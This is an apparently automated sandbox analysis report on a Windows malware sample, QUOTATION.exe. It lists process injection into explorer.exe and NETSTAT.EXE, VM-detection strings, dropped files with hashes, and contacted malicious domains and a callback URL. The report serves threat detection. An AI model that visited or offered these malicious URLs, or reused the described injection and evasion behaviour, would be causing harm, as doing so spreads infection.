Source: explorer.exe, 00000013.00000000.308707041.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\QUOTATION.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process queried: DebugPort			Jump to behavior

Windows Analysis Report QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Thread register set: target process: 3352	Jump to behavior

Source: explorer.exe, 00000013.00000000.299565234.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000013.00000000.336419113.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.323444529.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000013.00000000.344152528.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.309030845.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Name	IP	Active
purelai.store	208.51.62.42	true
www.archedbeautynw.com	192.185.0.218	true
www.purelai.store	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX	true	Avira URL Cloud: malware	unknown
www.purelai.store/p2r0/	true	Avira URL Cloud: malware	low

ID:	532906
Product:	CloudBasic
Start time:	19:53:41
Start date:	02.12.2021
Sample:	QUOTATION.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	213d8fd4b74e3b1122cfc1a9159aa579
SHA1:	3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256:	696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION.exe.log	ASCII text, with CRLF line terminators	D918C6A765EDB90D2A227FE23A3FEC98	8BA802AD8D740F114783F0DADC407CBFD2A209B3	AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	590EFBC148FE68AA56C46E9E0FF3D7F0	2690E695521BFA00E6989969BC9FB0F97E493A40	76F88D68E1EA3A3ACD8D130BDDCD5BB271D687693FE920AE14F5DE3A51453511
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nyncxzs.h2v.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oorirpyr.0hv.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\tmp8E88.tmp	XML 1.0 document, ASCII text	3CE40204A917DE9C82B360734EE652AA	78B42098FA8623993EF52FEAFC39CC252BBEB99F	99E8226821AC5FF2A5871E172ED6501E3D291329979B9B81850DE9718A24898E
C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	213D8FD4B74E3B1122CFC1A9159AA579	3FCEA21CA260C922F371877BEF1CEC0B2293F1E9	696BA286FA1D2D46B09DEE92733F9CA34BFE3E58F50A440A3EC89F63BBA76441
C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\Documents\20211202\PowerShell_transcript.609290.OySUyLIk.20211202195435.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D457A5A89526EB2350FDE3583929DE9B	450067DCFCB07C3E3B2F63067C9D83E0268BB9EC	B563FCC5EF242AFB3A95F52F69B4036FCFBFA64AAE1097F162A8D6EA59C55AA2